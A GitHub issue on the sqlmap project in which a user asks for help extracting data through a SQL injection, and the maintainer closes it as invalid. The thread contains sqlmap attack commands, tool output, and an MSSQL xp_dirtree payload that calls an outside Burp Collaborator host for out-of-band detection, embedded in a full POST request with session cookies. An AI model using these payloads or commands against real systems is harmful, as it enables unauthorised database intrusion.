### ISSUE TITLE
Help please.!!!

### ISSUE THREAD

**Issue by gerardmendez** [sqlmapproject/sqlmap#3743]
I try with this options  WHAT IS THE RIGHT SYNTAX

sqlmap.py -r request.txt -p mail --level 5 --risk 3 --dns-domain="hdy2n6afwmd8k4f1ba492s8w4naqyjmady5lw9l.burpcollaborator.net" --force-dns --banner --dbms=MSSQL

sqlmap.py -r request.txt -p mail --level 5 --risk 3 --banner --dbms=MSSQL
Joining all request in the file 

And ever find In Generic Union but not can extract.

Example : 
[19:10:13] [INFO] parsing HTTP request from 'request.txt'
[19:10:13] [INFO] setting up DNS server instance
Multipart-like data found in POST data. Do you want to process it? [Y/n/q] y
[19:10:20] [INFO] flushing session file
[19:10:20] [INFO] testing connection to the target URL
sqlmap got a 301 redirect to 'https://localhost/recordar.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[19:10:27] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:10:27] [INFO] testing if the target URL content is stable
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[19:10:31] [WARNING] (custom) POST parameter 'MULTIPART mail' does not appear to be dynamic
[19:10:31] [WARNING] heuristic (basic) test shows that (custom) POST parameter 'MULTIPART mail' might not be injectable
[19:10:32] [INFO] testing for SQL injection on (custom) POST parameter 'MULTIPART mail'

Issue:  
SQL injection
Severity:  
High
Confidence:  
Certain
Host:  
https://localhost
Path:  
/recordar.php
  
Issue detail
The mail parameter appears to be vulnerable to SQL injection attacks. The payload ';declare @q varchar(99);set @q='\\hdy2n6afwmd8k4f1ba492s8w4naqyjmady5lw9l.burpcollab'+'orator.net\pzz'; exec master.dbo.xp_dirtree @q;-- was submitted in the mail parameter. This payload injects a SQL query that calls SQL Server's xp_dirtree stored procedure with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.  The database appears to be Microsoft SQL Server.

POST /recordar.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Referer: https://localhost/recordar.php
Content-Type: multipart/form-data; boundary=--------1213380513
Content-Length: 261
Cookie: PHPSESSID=mdpja4ad4ll77pl0vuac0pmcr2; visid_incap_888969=PSTFGqspSk+Jm5Lb6pu/DtiA+VwAAAAAQUIPAAAAAAAQwpFvf/3r24S8BWl4exU/; nlbi_888969=FosDJ5KcIFOs0SwjnvKAsQAAAAA9tHkZ1NM5NuJJBLrGipQo; incap_ses_490_888969=dQhWVBSHD2nxf974xtXMBtiA+VwAAAAAUXzHmFGeVVGox9RYkMsvfA==

----------1213380513
Content-Disposition: form-data; name="username"

XYsZCGqI
----------1213380513
Content-Disposition: form-data; name="mail"

391767';declare @q varchar(99);set @q='\\hdy2n6afwmd8k4f1ba492s8w4naqyjmady5lw9l.burpcollab'+'orator.net\pzz'; exec master.dbo.xp_dirtree @q;-- 
----------1213380513
Content-Disposition: form-data; name="send"

Enviar
----------1213380513--

**Comment by stamparm** [comment]
1) It is not clear what's the "issue" here. Will close it down as invalid
2) You are using burpcollaborator.net in sqlmap. Not sure who told you to do it. sqlmap doesn't work like that. Please use Burp in such cases. sqlmap requires ITS own domain (i.e. yours) for you to run `--dns-domain`. Your case is same as you've put google's domain. **It doesn't make any sense**
3) You can take a look (e.g.) into https://github.com/sqlmapproject/sqlmap/issues/3078 and https://github.com/sqlmapproject/sqlmap/issues/1788
